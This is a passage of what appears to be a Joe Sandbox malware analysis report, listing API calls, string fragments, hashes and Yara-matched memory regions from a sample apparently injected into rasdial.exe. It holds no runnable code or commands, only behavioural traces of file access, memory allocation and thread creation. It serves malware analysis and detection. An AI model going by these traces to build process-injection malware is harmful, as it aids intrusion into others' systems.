                                                      • Instruction ID: 38a7bbf4e5a7419e01ee8a39f0beed97ec6793b72ff708df771ae9c57db28e6d
                                                      • Opcode Fuzzy Hash: 0e1d8ef03eb6a860b280abea23434063e9afc4993b95a7fd97b3d0aa26dfd1a3
                                                      • Instruction Fuzzy Hash: C9115AB4D0625CAADF00DFC4AA855DDBB79EF46280F149089E510BB350D3750A05CBD6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $e$k$o
                                                      • API String ID: 0-3624523832
                                                      • Opcode ID: 92e2e38bdecacd9e9dfc5babffd75e8b0914226b6e72fc872b2df58742580849
                                                      • Instruction ID: f6496462aaca06d2af73590bf68e78c7b157f4e3fb4cebef91a8366c2e0fdf5a
                                                      • Opcode Fuzzy Hash: 92e2e38bdecacd9e9dfc5babffd75e8b0914226b6e72fc872b2df58742580849
                                                      • Instruction Fuzzy Hash: 67B121B6A00304AFDB14DBA4CC85FEFB7FDAF88704F148558F61997244DA75AA41CBA0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $e$k$o
                                                      • API String ID: 0-3624523832
                                                      • Opcode ID: d3a89d8224864edf89595694a78bc688ecec70b2e5ad62f9d54de05d73ec686c
                                                      • Instruction ID: 5c0c74196523ac8d8eae722d89d0c231381a06498d215222bc2871f8f0185f31
                                                      • Opcode Fuzzy Hash: d3a89d8224864edf89595694a78bc688ecec70b2e5ad62f9d54de05d73ec686c
                                                      • Instruction Fuzzy Hash: A36132B6A00344AFDB54DFA4CC84FEFB7BDAF88704F148558E61997244DB71AA41CBA0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                      • API String ID: 0-2877786613
                                                      • Opcode ID: 4b1b3be30f2521f66a96d901e6f261103f9524e0028fbb17d3f8b2e6b26aa2b4
                                                      • Instruction ID: c24829a510ab8dc795ccfef14d7503106a45efda3bf6d1eaf56da10b448af25d
                                                      • Opcode Fuzzy Hash: 4b1b3be30f2521f66a96d901e6f261103f9524e0028fbb17d3f8b2e6b26aa2b4
                                                      • Instruction Fuzzy Hash: 6341FAB1A112587AFB11EB908D46FEF777CEFD5B00F044148BA04AA284D6B4BB4587A6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 1$3$4$6
                                                      • API String ID: 0-3685021172
                                                      • Opcode ID: b2fb09e57e9186eb9b078b52234a678e40f2812c1f51ce2e7918de4935321bd7
                                                      • Instruction ID: 305b1a4e86b132c88634bec15f1efe9ee23eba507a1a33716eaf3463b63c286a
                                                      • Opcode Fuzzy Hash: b2fb09e57e9186eb9b078b52234a678e40f2812c1f51ce2e7918de4935321bd7
                                                      • Instruction Fuzzy Hash: 99314FB1A00209ABFF04DBA4CD45FEE77B8EF44304F044199E904A7240E6B6AA058BE5

                                                      Execution Graph

                                                      Execution Coverage:2.4%
                                                      Dynamic/Decrypted Code Coverage:4.4%
                                                      Signature Coverage:2.3%
                                                      Total number of Nodes:436
                                                      Total number of Limit Nodes:69

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 5R$5w$9$Ib$Q$`+$a~$m$nQ$o]5R$s:$uS$zI$zI$|K$*$e
                                                      • API String ID: 0-1284554664
                                                      • Opcode ID: 6f6d19ed633df4d8167e323aebc3b45e8cfc539ffc2e82b0dbae00823930dee8
                                                      • Instruction ID: c45cb8522d7e37abcf6bd2ecfbf577905fa6ea5c6ffb5b1b83f5c570cf986ed5
                                                      • Opcode Fuzzy Hash: 6f6d19ed633df4d8167e323aebc3b45e8cfc539ffc2e82b0dbae00823930dee8
                                                      • Instruction Fuzzy Hash: 1BF1E1B0D05229CBEB24CF45C984BEEBBB2FB84308F1085D9D119AB285CBB55A85DF44
                                                      APIs
                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 02C5C0C4
                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 02C5C0FF
                                                      • FindClose.KERNELBASE(?), ref: 02C5C10A
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 3541575487-0
                                                      • Opcode ID: 183d07411173119dccee7f1c1f1c1e8b46fa8c21f169a4b71d8de96510959e2b
                                                      • Instruction ID: 64241ca0e4f157a2a194220bc49541c23109a6bab9f729e48cd3e31d06c741dc
                                                      • Opcode Fuzzy Hash: 183d07411173119dccee7f1c1f1c1e8b46fa8c21f169a4b71d8de96510959e2b
                                                      • Instruction Fuzzy Hash: 9A319075A003187BDB20EB60CC85FFB777D9F94748F184459B908A6180DBB0AB849FA5
                                                      APIs
                                                      • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02C68BEE
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: c6fb6999348f3af72f1cc51418021961808632196b4a4eb8d88b63391d19d734
                                                      • Instruction ID: ab7ac9f5465af18cfc1a428be6c6e127ac9d8c972afbab94274fa5951bed7eb5
                                                      • Opcode Fuzzy Hash: c6fb6999348f3af72f1cc51418021961808632196b4a4eb8d88b63391d19d734
                                                      • Instruction Fuzzy Hash: B03191B5A15209AFCB14DF98D880EEEB7F9EF8C314F108219F919A7340D770A951CBA5
                                                      APIs
                                                      • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02C68D46
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: db0a028c632bf0c982bb05e8a047058077fb82843c8c03a02494181fc528af7a
                                                      • Instruction ID: a0dab1c822a45f85e3e93f5f0bea0f369ce1342b5c4b8c1976fdc0524c27c742
                                                      • Opcode Fuzzy Hash: db0a028c632bf0c982bb05e8a047058077fb82843c8c03a02494181fc528af7a
                                                      • Instruction Fuzzy Hash: D631BEB5A10208AFDB14DF98D881EEFB7F9EF8C314F148219F959A7240D670A9118BA5
                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(02C5175E,?,02C67A1F,00000000,00000004,00003000,?,?,?,?,?,02C67A1F,02C5175E,00000000,?,02C67A1F), ref: 02C69018
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: 7a32e4266d3364f5bb98c5e2f1ddbd2de5c4ba772474a9a6bbcce0c7e3460e66
                                                      • Instruction ID: 422a796213a9ab8b7900aef9e2eaef26626ddf7b7b1bd7627f8667ea241aea8a
                                                      • Opcode Fuzzy Hash: 7a32e4266d3364f5bb98c5e2f1ddbd2de5c4ba772474a9a6bbcce0c7e3460e66
                                                      • Instruction Fuzzy Hash: 822104B5A10209AFDB14DF98DC81EAFB7B9EF89310F008609FD19A7240D770A9118BA1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID:
                                                      • API String ID: 4033686569-0
                                                      • Opcode ID: 110d16c233577d73d152ab67d92dfb61f057c6717e630057d0ac7b2722b6b0b0
                                                      • Instruction ID: 3c3f5b167deb6e691097ea96d3aaf630296bb25710a1263bf90c76fed09a0cc0
                                                      • Opcode Fuzzy Hash: 110d16c233577d73d152ab67d92dfb61f057c6717e630057d0ac7b2722b6b0b0
                                                      • Instruction Fuzzy Hash: 9F115E71611608BFD720EB68CC55FBF73ADDF89314F404609FA59A7280D7716A018BA5
                                                      APIs
                                                      • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02C68E27
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: 7fea8813780153429a3e2bc9ce62912ee225e97507eed709cacbc900be663fb2
                                                      • Instruction ID: d1ec627e8423481816f74f63b15ff2d9bf175a9b8f376d4905eeca214d151a5e
                                                      • Opcode Fuzzy Hash: 7fea8813780153429a3e2bc9ce62912ee225e97507eed709cacbc900be663fb2
                                                      • Instruction Fuzzy Hash: BDE08C362043047FD620EA69DC40F9B77AEEFC6764F508055FA49A7241CAB1B9018BF1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 7c8ea4ccb342388f7daf3f90f62a81033258ebc6fd4d2e70990a38d77b3b8a6b
                                                      • Instruction ID: 7040be865d7837c3b15088d3924dcf30b50bb926335c7454e8c76d3eaa0983a0
                                                      • Opcode Fuzzy Hash: 7c8ea4ccb342388f7daf3f90f62a81033258ebc6fd4d2e70990a38d77b3b8a6b
                                                      • Instruction Fuzzy Hash: 34900262601500426140715848084067005DBE1305395C165A0655565C8618D9569269
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 289d915853e225bdc570ed6fefaab1c509367fa7816dff4792d1796e89f6d6b2
                                                      • Instruction ID: e2c942ed9fe14355425e501f8d575bf8f6b28a530c43cba8a79290d75f89df89
                                                      • Opcode Fuzzy Hash: 289d915853e225bdc570ed6fefaab1c509367fa7816dff4792d1796e89f6d6b2
                                                      • Instruction Fuzzy Hash: D590023260580012B140715848885465005DBE0305B55C061E0525559C8A14DA575361
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f0deb5c9cc28746fc74d7c3f191d6acf224ab141582e63c42141ae97a6e6e88f
                                                      • Instruction ID: 0917c9f1d81f39816f1218321fe17d56fe44b67c7eea2cb5ea59b6bdc3bce680
                                                      • Opcode Fuzzy Hash: f0deb5c9cc28746fc74d7c3f191d6acf224ab141582e63c42141ae97a6e6e88f
                                                      • Instruction Fuzzy Hash: FE90023220140402F1007598540C6461005CBE0305F55D061A512555AEC665D9926131
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 1b8be2571119cf27bae682e5a94d73465dced0635eb184143fda32cf265fedab
                                                      • Instruction ID: 9fd501b27058504f3e05e3ab8d98a28ed97fd796c8d29e699f252c6fa4f7ccdb
                                                      • Opcode Fuzzy Hash: 1b8be2571119cf27bae682e5a94d73465dced0635eb184143fda32cf265fedab
                                                      • Instruction Fuzzy Hash: E190023220148802F1107158840874A1005CBD0305F59C461A452565DD8695D9927121
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f4c7aa27d0b79c69ac39753fd5f98e6d5b853a542808ecc235c7cb5c42a81bc6
                                                      • Instruction ID: 5585b0e2e08c6b0688efbc35589b2b99d964966de6b440e9d5c682d135c6f9c7
                                                      • Opcode Fuzzy Hash: f4c7aa27d0b79c69ac39753fd5f98e6d5b853a542808ecc235c7cb5c42a81bc6
                                                      • Instruction Fuzzy Hash: 8390023220140842F10071584408B461005CBE0305F55C066A0225659D8615D9527521
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 7994bec4ae000e46de7a30020bbc27cabb8bfa8f1cfcd3b06dd8410f0ab0aaab
                                                      • Instruction ID: 6a3fa5a5c3bb12822c0c6b6d27681c6915d1897d9aeb2dff71928cd6cee02fac
                                                      • Opcode Fuzzy Hash: 7994bec4ae000e46de7a30020bbc27cabb8bfa8f1cfcd3b06dd8410f0ab0aaab
                                                      • Instruction Fuzzy Hash: F190023220140413F111715845087071009CBD0245F95C462A052555DD9656DA53A121
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: ef02fbbf06e76cfda87501b6d9b99bffd9cc30caba5db8d13183da3f1222b25f
                                                      • Instruction ID: 34035ca6726502d48475de189882943cdea90fde3f13f35748ecf0b8bd5e4eeb
                                                      • Opcode Fuzzy Hash: ef02fbbf06e76cfda87501b6d9b99bffd9cc30caba5db8d13183da3f1222b25f
                                                      • Instruction Fuzzy Hash: 96900222242441527545B15844085075006DBE0245795C062A1515955C8526E957D621
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: b273575da96760063af301a1b7c5d3f8b6f5e08abf4d0a5fc5ce62638d7e1531
                                                      • Instruction ID: f8e0bf1ed829d43c9cdafb23509ee93e215f1eedd993d45294d1fc25c2528d8e
                                                      • Opcode Fuzzy Hash: b273575da96760063af301a1b7c5d3f8b6f5e08abf4d0a5fc5ce62638d7e1531
                                                      • Instruction Fuzzy Hash: 4290022230140003F1407158541C6065005DBE1305F55D061E0515559CD915D9575222
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 8efb0f464e82b1d153500ce1ffb41e68c7bab8999709b51ba51380ff2b0f1877
                                                      • Instruction ID: 744af915f8ba2232a4f11e8f25d9d159c04ef99d7063848c8dce8f9400d58b87
                                                      • Opcode Fuzzy Hash: 8efb0f464e82b1d153500ce1ffb41e68c7bab8999709b51ba51380ff2b0f1877
                                                      • Instruction Fuzzy Hash: 5090022A21340002F1807158540C60A1005CBD1206F95D465A011655DCC915D96A5321
                                                      APIs
                                                      • Sleep.KERNELBASE(000007D0), ref: 02C635BB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: net.dll$wininet.dll
                                                      • API String ID: 3472027048-1269752229
                                                      • Opcode ID: cb1bee77de7e6addf56677105ffe8a9ddc40c3b2228cf65e4303965812760a85
                                                      • Instruction ID: 55ade824e9ce60ccb8b393624ee7d55e4eb713be79a9c4c3e8b9f95be4f5220b
                                                      • Opcode Fuzzy Hash: cb1bee77de7e6addf56677105ffe8a9ddc40c3b2228cf65e4303965812760a85
                                                      • Instruction Fuzzy Hash: 2F31BCB1600205BBDB14DFA4C8C4FFBBBB9FF88714F544018EA59AB240C770A640CBA5
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeUninitialize
                                                      • String ID: @J7<
                                                      • API String ID: 3442037557-2016760708
                                                      • Opcode ID: 011d672e5543e3db47c0c153c4695aad8b81cb8947645e4878a19fbbf52d4869
                                                      • Instruction ID: b975321ec84d1c8aa35d9638f8bb9fe82230dde2732368104bf2180f39b6b593
                                                      • Opcode Fuzzy Hash: 011d672e5543e3db47c0c153c4695aad8b81cb8947645e4878a19fbbf52d4869
                                                      • Instruction Fuzzy Hash: 193121B5A0060A9FDB10DFD8C8809EFB7B9BF88304F108559E915E7254D775EE458BA0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeUninitialize
                                                      • String ID: @J7<
                                                      • API String ID: 3442037557-2016760708
                                                      • Opcode ID: 41f43cebcabf5616faa043f6ed83239c813c17aa1f39eb39fe1040b52d41743f
                                                      • Instruction ID: da234e2f4284de2d53bba7130c6ec2dfa3b2da0739242d486edfb4a4cdbdc491
                                                      • Opcode Fuzzy Hash: 41f43cebcabf5616faa043f6ed83239c813c17aa1f39eb39fe1040b52d41743f
                                                      • Instruction Fuzzy Hash: 523130B5A0060A9FDB10DFD8C8809EFB7B9BF88304F108559E915EB254DB75EE45CBA0
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02C53FA2
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: e16a34ff752e58ab3819758e70589ed3c0c4bade0b9e16962d66035ee37cb21f
                                                      • Instruction ID: 8eaf6f5563c11e96b31d32def3511a7a9419b82eb13da66e7b94ddf2c12e199c
                                                      • Opcode Fuzzy Hash: e16a34ff752e58ab3819758e70589ed3c0c4bade0b9e16962d66035ee37cb21f
                                                      • Instruction Fuzzy Hash: E5011EB5D0020DABDB10EAE4DC85FADB7799B94308F0042D5AD18A7241F671EB58DB91
                                                      APIs
                                                      • CreateProcessInternalW.KERNELBASE(?,?,?,?,02C57D1E,00000010,?,?,?,00000044,?,00000010,02C57D1E,?,?,?), ref: 02C69240
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: 2f6ac9e8aaa5c724821357bd286b7ac54767ad4f1283a8855f4653ad494c20a0
                                                      • Instruction ID: 700b3e8c7f1f6426aa9df777123c3036054d9cf57731e0dfb57b431fa9d64c48
                                                      • Opcode Fuzzy Hash: 2f6ac9e8aaa5c724821357bd286b7ac54767ad4f1283a8855f4653ad494c20a0
                                                      • Instruction Fuzzy Hash: CF01C0B2204248BBCB54DE89DC90EEB77EEAF8C754F408108BA09E3240D630FC518BA4
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c4b94c2314521d8f25ea77e2c4b1031aa999e68fa5996bdd45285a49d38e8a29
                                                      • Instruction ID: 18f04922592f2d3ebaf95dc29eb3815f624922b094c6660ac2ea2f02c73d0924
                                                      • Opcode Fuzzy Hash: c4b94c2314521d8f25ea77e2c4b1031aa999e68fa5996bdd45285a49d38e8a29
                                                      • Instruction Fuzzy Hash: F001F975D406499BE700CFA8D844FAAB7B6EB48304F0046DADD1587210FB31E686CB81
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02C499E5
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: 16c0e71b6372fec22eebbbca97e89183367efa31272dd7e647b078886704f17d
                                                      • Instruction ID: f9d1b143bfe20287400c0168a74d08cffa06beed066ff394cfc129242ad7885a
                                                      • Opcode Fuzzy Hash: 16c0e71b6372fec22eebbbca97e89183367efa31272dd7e647b078886704f17d
                                                      • Instruction Fuzzy Hash: 3DF0653338031436D22066A99C46FDBB75DCB817A5F140025F70CDB1C0D9A1B54156A5
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02C499E5
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: 466464831a6234b5cf27503d40ed54007358e1f93d1157a7e47aaa5bfc18c748
                                                      • Instruction ID: 8d07590f02dd74463ba546ac535e6c541158b04011f8eadb3dba2278d672a16a
                                                      • Opcode Fuzzy Hash: 466464831a6234b5cf27503d40ed54007358e1f93d1157a7e47aaa5bfc18c748
                                                      • Instruction Fuzzy Hash: F6F0E53374021435D23166A58C46FEBB76DCF80754F240018F64DAB1C0CEA1B901D6B5
                                                      APIs
